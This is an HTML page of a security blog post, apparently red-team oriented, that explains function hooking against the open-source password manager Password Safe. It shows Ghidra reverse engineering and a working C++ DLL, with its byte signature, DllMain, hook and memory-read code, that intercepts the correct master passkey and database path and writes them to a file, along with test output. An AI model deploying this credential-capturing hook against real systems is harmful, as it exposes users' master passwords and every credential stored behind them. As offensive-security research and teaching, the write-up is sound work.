<!DOCTYPE html>
<html lang="en-us"><head><meta charset="utf-8">
<meta http-equiv="content-type" content="text/html">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title itemprop="name">Function Hooking Part 2 - Password Safe | Lum8rjack</title>
<meta property="og:title" content="Function Hooking Part 2 - Password Safe | Lum8rjack" />
<meta name="twitter:title" content="Function Hooking Part 2 - Password Safe | Lum8rjack" />
<meta itemprop="name" content="Function Hooking Part 2 - Password Safe | Lum8rjack" />
<meta name="application-name" content="Function Hooking Part 2 - Password Safe | Lum8rjack" />
<meta property="og:site_name" content="Lum8rjack Blog" />

<meta name="description" content="Minimal Hugo blog theme with light and dark mode support">
<meta itemprop="description" content="Minimal Hugo blog theme with light and dark mode support" />
<meta property="og:description" content="Minimal Hugo blog theme with light and dark mode support" />
<meta name="twitter:description" content="Minimal Hugo blog theme with light and dark mode support" />

<meta property="og:locale" content="en-us" />
<meta name="language" content="en-us" />

  <link rel="alternate" hreflang="en-us" href="https://blog.lum8rjack.com/posts/function-hooking-part-2/" title="" />



  <meta itemprop="image" content="https://blog.lum8rjack.com/" />
  <meta property="og:image" content="https://blog.lum8rjack.com/" />
  <meta name="twitter:image" content="https://blog.lum8rjack.com/" />
  <meta name="twitter:image:src" content="https://blog.lum8rjack.com/" />




    
    
    

    <meta property="og:type" content="article" />
    <meta property="og:article:published_time" content=2021-02-06T00:00:00Z />
    <meta property="article:published_time" content=2021-02-06T00:00:00Z />

    

    

    <script defer type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "Article",
        "headline": "Function Hooking Part 2 - Password Safe",
        "author": {
        "@type": "Person",
        "name": ""
        },
        "datePublished": "2021-02-06",
        "description": "",
        "wordCount":  1316 ,
        "mainEntityOfPage": "True",
        "dateModified": "2021-02-06",
        "image": {
        "@type": "imageObject",
        "url": ""
        },
        "publisher": {
        "@type": "Organization",
        "name": "Lum8rjack"
        }
    }
    </script>


<meta name="generator" content="Hugo 0.149.0">

    

    <link rel="canonical" href="https://blog.lum8rjack.com/posts/function-hooking-part-2/">
    <link href="/style.min.d43bc6c79baa87f006efb2b92be952faeedeb1a3ab626c1d6abda52eae049355.css" rel="stylesheet">
    <link href="/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css" rel="stylesheet">

    
    <link rel="apple-touch-icon" sizes="180x180" href="/icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/icons/favicon-16x16.png">
    <link rel="mask-icon" href="/icons/safari-pinned-tab.svg">
    <link rel="shortcut icon" href="/favicon.ico">




<link rel="manifest" href="https://blog.lum8rjack.com/site.webmanifest">

<meta name="msapplication-config" content="/browserconfig.xml">
<meta name="msapplication-TileColor" content="#2d89ef">
<meta name="theme-color" content="#434648">

    
    <link rel="icon" type="image/svg+xml" href="/icons/favicon.svg">

    
    
      <script async src="https://www.googletagmanager.com/gtag/js?id=G-DLFPYYTDTZ"></script>
      <script>
        var doNotTrack = false;
        if ( false ) {
          var dnt = (navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack);
          var doNotTrack = (dnt == "1" || dnt == "yes");
        }
        if (!doNotTrack) {
          window.dataLayer = window.dataLayer || [];
          function gtag(){dataLayer.push(arguments);}
          gtag('js', new Date());
          gtag('config', 'G-DLFPYYTDTZ');
        }
      </script></head>
<body data-theme = "dark" class="notransition">

<script src="/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js" integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script>

<div class="navbar" role="navigation">
    <nav class="menu" aria-label="Main Navigation">
        <a href="https://blog.lum8rjack.com/" class="logo">
            <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" 
viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" 
stroke-linejoin="round" class="feather feather-home">
<title>Home</title>
<path d="M3 9l9-7 9 7v11a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2z"></path>
<polyline points="9 22 9 12 15 12 15 22"></polyline>
</svg>
        </a>
        <input type="checkbox" id="menu-trigger" class="menu-trigger" />
        <label for="menu-trigger">
            <span class="menu-icon">
                <svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentColor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7L3.40726 7"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488L3.49301 3.51488"></path><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"></path><path stroke-linecap="round" stroke-linejoin="round" d="M0.5 12.5V1.5C0.5 0.947715 0.947715 0.5 1.5 0.5H12.5C13.0523 0.5 13.5 0.947715 13.5 1.5V12.5C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C0.947715 13.5 0.5 13.0523 0.5 12.5Z"></path></svg>
            </span>
        </label>

        <div class="trigger">
            <ul class="trigger-container">
                
                
                <li>
                    <a class="menu-link " href="/">
                        Home
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link active" href="/posts/">
                        Posts
                    </a>
                    
                </li>
                
                <li>
                    <a class="menu-link " href="/about/">
                        About
                    </a>
                    
                </li>
                
                <li class="menu-separator">
                    <span>|</span>
                </li>
                
                
            </ul>
            <a id="mode" href="#">
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
                <svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1">
<title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></circle><line x1="7" y1="0.5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="0.5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"></line><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"></line></g></svg>
            </a>
        </div>
    </nav>
</div>

<div class="wrapper post">
    <main class="page-content" aria-label="Content">
        <article>
            <header class="header">
                <h1 class="header-title">Function Hooking Part 2 - Password Safe</h1>
                
                
                <div class="post-meta">
                    <time datetime="2021-02-06T00:00:00&#43;00:00" itemprop="datePublished"> Feb 6, 2021 </time>
                </div>
                
            </header>
            
    
    <details class="toc" ZgotmplZ>
        <summary><b>Table of Contents</b></summary>
        <nav id="TableOfContents">
  <ul>
    <li><a href="#what-is-password-safe">What Is Password Safe?</a></li>
    <li><a href="#using-password-safe">Using Password Safe</a></li>
    <li><a href="#function-signature">Function Signature</a></li>
    <li><a href="#writing-the-dll">Writing The DLL</a></li>
    <li><a href="#testing">Testing</a></li>
    <li><a href="#wrap-up">Wrap-Up</a></li>
    <li><a href="#references--acknowledgements">References / Acknowledgements</a></li>
  </ul>
</nav>
    </details>
            <div class="page-content">
                <p>In this post I will expand on the information from my first post, <a href="https://blog.lum8rjack.com/posts/function-hooking-part-1/">Function Hooking Part 1 - Test Program</a>. Previously, I discussed hooking a function from a custom application, in this post I will be hooking a function in the open-source password manager <a href="https://pwsafe.org/">Password Safe</a>.</p>
<p>As you can image, password managers are valuable targets during red team engaments since they contain additional credentials for other services or computers. If the main password to open the database is known or obtained, then all of the other credentials in the database are compromised.</p>
<h2 id="what-is-password-safe">What Is Password Safe?</h2>
<p>Password Safe is a free and open-source password manager. According to <a href="https://en.wikipedia.org/wiki/Password_manager">Wikipedia</a>, a password manager is &ldquo;a computer program that allows users to store, generate, and manage their passwords for local applications and online services. A password manager assists in generating and retrieving complex passwords, storing such passwords in an encrypted database or calculating them on demand&rdquo;.</p>
<p>Like many other password managers, Password Safe has functionality that includes:</p>
<ul>
<li>Password management - Stores passwords securely and can be sectioned into groups</li>
<li>Import and export - Ability to export passwords to TXT or XML and also import passwords from TXT or CSV files</li>
<li>File encryption - Ability to encrypt files</li>
<li>Password generator - Built-in password generator</li>
</ul>
<p><img src="/img/FunctionHooking2/pwsafe_example.png" alt="pwsafe_example"></p>
<p>Other password managers include:</p>
<ul>
<li><a href="https://keepass.info/">KeePass</a></li>
<li><a href="https://www.lastpass.com/">Lastpass</a></li>
<li><a href="https://1password.com/">1Password</a></li>
</ul>
<h2 id="using-password-safe">Using Password Safe</h2>
<p>Before I begin finding signatures and writing code, it is important to understand how the application works. I have installed Password Safe version 3.54  with the pwsafe.exe file details below.</p>
<p><img src="/img/FunctionHooking2/pwsafe_version.png" alt="pwsafe_version"></p>
<p>When the program is first executed, it requires the user to either select a database or create a new one.</p>
<p><img src="/img/FunctionHooking2/pwsafe_startup.png" alt="pwsafe_startup"></p>
<p>When I click on New, it asks for the name of the database and location.</p>
<p><img src="/img/FunctionHooking2/pwsafe_new.png" alt="pwsafe_new"></p>
<p>After clicking Save, it then asks me to set the safe combination passkey.</p>
<p><img src="/img/FunctionHooking2/pwsafe_new_passkey.png" alt="pwsafe_new_passkey"></p>
<p>Once completed, it opens a blank database.</p>
<p><img src="/img/FunctionHooking2/pwsafe_open_blank.png" alt="pwsafe_open_blank"></p>
<p>I can then add new entries by clicking on Edit -&gt; Add Entry&hellip;</p>
<p><img src="/img/FunctionHooking2/pwsafe_add_entry.png" alt="pwsafe_add_entry"></p>
<p>I can provide the username, password, URL, and any additional notes that might be useful to save. Having to only remember one master password to access all other account information is a major benefit to password managers.</p>
<p><img src="/img/FunctionHooking2/pwsafe_example.png" alt="pwsafe_example"></p>
<p>You can see from the image above, I have added a few extra entries and grouped them by different categories.</p>
<p>Now that the database is setup, the next step it figuring out how to gain access to the master passkey.</p>
<h2 id="function-signature">Function Signature</h2>
<p>Just like in <a href="https://blog.lum8rjack.com/posts/function-hooking-part-1/">Part 1</a>, I first need to find the function to hook. From testing Password Safe, I know I want to hook the function that checks if the provided password to open the database is correct or not. Since Password Safe is open-sourced, I start by looking through the source code.</p>
<p><img src="/img/FunctionHooking2/github_pwsfile.png" alt="pwsafe"></p>
<p>It looks like the &ldquo;CheckPasskey&rdquo; function arguments include the filename of the database, the passkey, and also the version of the database. Hooking this function will allow me to intercept the correct passkey and save it to a text file.</p>
<p>Next, I load the pwsafe.exe binary into Ghidra and analyze the file. The file does not include debugging symbols like our test program from before, so it makes it harder to search for the function name. I first search for strings containing &ldquo;CheckPasskey&rdquo;.</p>
<p><img src="/img/FunctionHooking2/re_search_strings.png" alt="re_strings"></p>
<p>I clicked on the first entry and can see the decompiled code below the search box. I then right clicked on the section in the listing view and clicked References -&gt; Show References to Address.</p>
<p><img src="/img/FunctionHooking2/re_references.png" alt="re_references"></p>
<p>It shows one reference that is included in the &ldquo;FUN_0075a5f0&rdquo; function. I then right click on the function name in the decompiler view to search for functions that reference the &ldquo;FUN_0075a5f0&rdquo; function.</p>
<p><img src="/img/FunctionHooking2/re_references2.png" alt="re_references2"></p>
<p>Clicking on the first reference shows me a function that looks almost identical to the &ldquo;CheckPasskey&rdquo; function I was looking for. The function takes three arguments and performs similar checks by passing them to other functions that seem to be related.</p>
<p><img src="/img/FunctionHooking2/re_ghidra.png" alt="pwsafe"></p>
<p>Similar to the test program in part 1, I identify the first few bytes of the function in order to create the function signature.</p>
<h2 id="writing-the-dll">Writing The DLL</h2>
<p>Now I have all of the information I need in order to create the DLL that will be injected into the program. The &ldquo;DllMain&rdquo; function identifies the &ldquo;pwsafe.exe&rdquo; program in memory, searches for the &ldquo;CheckPasskey&rdquo; signature we identified earlier, and then jumps to the hook function &ldquo;HookCheckPasskey&rdquo;.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c++" data-lang="c++"><span class="line"><span class="cl"><span class="n">BOOL</span> <span class="n">APIENTRY</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HMODULE</span> <span class="n">hModule</span><span class="p">,</span> <span class="n">DWORD</span>  <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpReserved</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">	<span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="n">writeToFile</span><span class="p">(</span><span class="s">&#34;[+] Injected</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">SigScan</span> <span class="n">Scanner</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="kt">char</span> <span class="n">program</span><span class="p">[]</span> <span class="o">=</span> <span class="s">&#34;pwsafe.exe&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="kt">char</span> <span class="n">signature</span><span class="p">[]</span> <span class="o">=</span> <span class="s">&#34;</span><span class="se">\x55\x8b\xec\x83\xec\x10\xb8\xcc\xcc\xcc\xcc\x89\x45\xf0\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc\x8b\x45\x0c\x8b\x48</span><span class="s">&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="kt">char</span> <span class="n">mask</span><span class="p">[]</span> <span class="o">=</span> <span class="s">&#34;xxxxxxxxxxxxxxxxxxxxxxxxxxxx&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">AddressOfOrigFunc</span> <span class="o">=</span> <span class="n">Scanner</span><span class="p">.</span><span class="n">FindPattern</span><span class="p">(</span><span class="n">program</span><span class="p">,</span> <span class="n">signature</span><span class="p">,</span> <span class="n">mask</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="kt">int</span><span class="o">*</span> <span class="n">noAddress</span> <span class="o">=</span> <span class="mh">0x00000000</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="c1">// check if the signature / address was found in memory
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>		<span class="k">if</span> <span class="p">((</span><span class="n">LPVOID</span><span class="o">&amp;</span><span class="p">)</span><span class="n">AddressOfOrigFunc</span> <span class="o">!=</span> <span class="n">noAddress</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="n">hooked</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">			
</span></span><span class="line"><span class="cl">			<span class="kt">char</span> <span class="n">x</span><span class="p">[</span><span class="mi">50</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">			<span class="n">sprintf_s</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="s">&#34;[+] Address of original function: 0x%p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">LPVOID</span><span class="o">&amp;</span><span class="p">)</span><span class="n">AddressOfOrigFunc</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="n">writeToFile</span><span class="p">(</span><span class="n">x</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">			<span class="n">DetourTransactionBegin</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">			<span class="n">DetourUpdateThread</span><span class="p">(</span><span class="n">GetCurrentThread</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">			<span class="c1">// this will hook the function
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>			<span class="n">DetourAttach</span><span class="p">(</span><span class="o">&amp;</span><span class="p">(</span><span class="n">LPVOID</span><span class="o">&amp;</span><span class="p">)</span><span class="n">AddressOfOrigFunc</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">HookCheckPassKey</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="n">DetourTransactionCommit</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">		<span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="n">writeToFile</span><span class="p">(</span><span class="s">&#34;[-] Address for the function not found</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="n">writeToFile</span><span class="p">(</span><span class="s">&#34;----------------------------------------------------</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span></code></pre></div><p>This fuction takes in the same parameters as the &ldquo;CheckPasskey&rdquo; function from Password Safe. The parameters are initially passed to the orignial function so I can receive the return value. If the return value is &ldquo;0&rdquo;, I know that the passkey entered was correct and I can save the passkey to the output file. I had to create the &ldquo;convertString&rdquo; function to properly retrieve the data from memory.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c++" data-lang="c++"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">HookCheckPassKey</span><span class="p">(</span><span class="n">string</span><span class="o">&amp;</span> <span class="n">filename</span><span class="p">,</span> <span class="n">string</span> <span class="o">&amp;</span><span class="n">passkey</span><span class="p">,</span> <span class="n">string</span><span class="o">&amp;</span> <span class="n">version</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="c1">// check if passkey is correct by running the original function
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>	<span class="n">CheckPassKey</span> <span class="n">originalCheck</span> <span class="o">=</span> <span class="p">(</span><span class="n">CheckPassKey</span><span class="p">)</span><span class="n">AddressOfOrigFunc</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">result</span> <span class="o">=</span> <span class="n">originalCheck</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span> <span class="n">passkey</span><span class="p">,</span> <span class="n">version</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="c1">// if the result is 0 the passkey is correct
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>	<span class="c1">// if it is 5 it is incorrect
</span></span></span><span class="line"><span class="cl"><span class="c1"></span>	<span class="k">if</span> <span class="p">(</span><span class="n">result</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">	<span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="kt">char</span> <span class="n">passkey_original_address</span><span class="p">[</span><span class="mi">50</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">		<span class="n">sprintf_s</span><span class="p">(</span><span class="n">passkey_original_address</span><span class="p">,</span> <span class="s">&#34;[+] Address of passkey: 0x%p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">LPVOID</span><span class="o">&amp;</span><span class="p">)</span><span class="n">passkey</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">writeToFile</span><span class="p">(</span><span class="n">passkey_original_address</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">convertString</span><span class="p">(</span><span class="s">&#34;Passkey&#34;</span><span class="p">,</span> <span class="n">passkey</span><span class="p">,</span> <span class="n">passkey</span><span class="p">.</span><span class="n">size</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">		<span class="n">convertString</span><span class="p">(</span><span class="s">&#34;Database&#34;</span><span class="p">,</span> <span class="n">filename</span><span class="p">,</span> <span class="n">filename</span><span class="p">.</span><span class="n">size</span><span class="p">());</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">result</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>During my testing, I attached <a href="https://x64dbg.com/">x64dbg</a> debugger to find the passkey in memory. Since the DLL is writing the memory addresses of the original function to the output file, it is easy to find the passkey in the memory dump.</p>
<p><img src="/img/FunctionHooking2/x32dbg_passkey.png" alt="x32dbg"></p>
<p>The passkey &ldquo;password123&rdquo; starts at memory address 0x01499080 where you can see each character is followed by a null byte. The &ldquo;convertString&rdquo; function takes three parameters: text that will be saved to the output file, the memory address where the passkey is located, and the length of the passkey.</p>
<p>The function calculates the number of bytes to read based off the length of the passkey and the extra null bytes. Then the function loops through the bytes and outputs the characters to the output file that are not null bytes.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c++" data-lang="c++"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">convertString</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[],</span> <span class="n">string</span><span class="o">&amp;</span> <span class="n">sValue</span><span class="p">,</span> <span class="kt">int</span> <span class="n">length</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">buff_size</span> <span class="o">=</span> <span class="n">length</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">char</span><span class="o">*</span> <span class="n">c</span> <span class="o">=</span> <span class="k">new</span> <span class="kt">char</span><span class="p">[</span><span class="n">buff_size</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">	<span class="n">SIZE_T</span> <span class="n">dwRead</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">ReadProcessMemory</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="p">(</span><span class="n">LPVOID</span><span class="o">&amp;</span><span class="p">)</span><span class="n">sValue</span><span class="p">,</span> <span class="n">c</span><span class="p">,</span> <span class="n">buff_size</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">dwRead</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">ofstream</span> <span class="n">myfile</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">myfile</span><span class="p">.</span><span class="n">open</span><span class="p">(</span><span class="n">outFile</span><span class="p">,</span> <span class="n">std</span><span class="o">::</span><span class="n">ios_base</span><span class="o">::</span><span class="n">app</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">myfile</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;[*] &#34;</span> <span class="o">&lt;&lt;</span> <span class="n">name</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;: &#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">buff_size</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">	<span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">c</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="n">myfile</span> <span class="o">&lt;&lt;</span> <span class="n">c</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="n">myfile</span> <span class="o">&lt;&lt;</span> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">myfile</span><span class="p">.</span><span class="n">close</span><span class="p">();</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">delete</span><span class="p">[]</span> <span class="n">c</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>Every time Password Safe tries calling the &ldquo;CheckPasskey&rdquo; function, I will now be able to intercept and save the passkey to a file.</p>
<h2 id="testing">Testing</h2>
<p>Now it is time to test out the DLL. After starting the application, I inject the DLL and can see the address of the original &ldquo;CheckPasskey&rdquo; function.</p>
<p><img src="/img/FunctionHooking2/injected.png" alt="injected"></p>
<p>By entering in the correct passkey, the output file now contains the passkey and database information.</p>
<p><img src="/img/FunctionHooking2/injected_correct.png" alt="injected_correct"></p>
<p>As you can see in the image below, the injected DLL will continue to save the output each time the user unlocks the database. The &ldquo;detached&rdquo; message will be written once the program has exited.</p>
<p><img src="/img/FunctionHooking2/injected_multiple.png" alt="injected_multiple"></p>
<p>I also tested the application by entering in a wrong passkey. It shows the wrong passkey was entered but does not write anything to the output file.</p>
<p><img src="/img/FunctionHooking2/injected_wrong_passkey.png" alt="injected_wrong_passkey"></p>
<h2 id="wrap-up">Wrap-Up</h2>
<p>These same techniques can be applied to other password managers or any other application. It can be used to to intercept data or add additional functionality to an application.</p>
<p>Example code <a href="https://github.com/lum8rjack/FunctionHooking">here</a>.</p>
<h2 id="references--acknowledgements">References / Acknowledgements</h2>
<ul>
<li><a href="https://pwsafe.org/">https://pwsafe.org/</a></li>
<li><a href="https://github.com/pwsafe/pwsafe">https://github.com/pwsafe/pwsafe</a></li>
<li><a href="https://en.wikipedia.org/wiki/Password_manager">https://en.wikipedia.org/wiki/Password_manager</a></li>
<li><a href="https://x64dbg.com/">https://x64dbg.com/</a></li>
<li><a href="https://github.com/lum8rjack/FunctionHooking">https://github.com/lum8rjack/FunctionHooking</a></li>
</ul>

            </div>
        </article></main>
</div>
<footer class="footer">
    <span class="footer_item"> </span>
    &nbsp;

    <div class="footer_social-icons">
<a href="https://github.com/lum8rjack" target="_blank" rel="noopener noreferrer me"
    title="Github">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path
        d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22">
    </path>
</svg>
</a>
<a href="https://x.com/lum8rjack" target="_blank" rel="noopener noreferrer me"
    title="X">
    <svg viewBox="0 0 1200 1227" fill="currentColor" xmlns="http://www.w3.org/2000/svg">
    <path
        d="M714.163 519.284L1160.89 0H1055.03L667.137 450.887L357.328 0H0L468.492 681.821L0 1226.37H105.866L515.491 750.218L842.672 1226.37H1200L714.137 519.284H714.163ZM569.165 687.828L521.697 619.934L144.011 79.6944H306.615L611.412 515.685L658.88 583.579L1055.08 1150.3H892.476L569.165 687.854V687.828Z"/>
</svg>
</a>
<a href="https://www.linkedin.com/in/muellerclint" target="_blank" rel="noopener noreferrer me"
    title="Linkedin">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path>
    <rect x="2" y="9" width="4" height="12"></rect>
    <circle cx="4" cy="4" r="2"></circle>
</svg>
</a>
<a href="index.xml" target="_blank" rel="noopener noreferrer me"
    title="Rss">
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"
    stroke-linecap="round" stroke-linejoin="round">
    <path d="M4 11a9 9 0 0 1 9 9" />
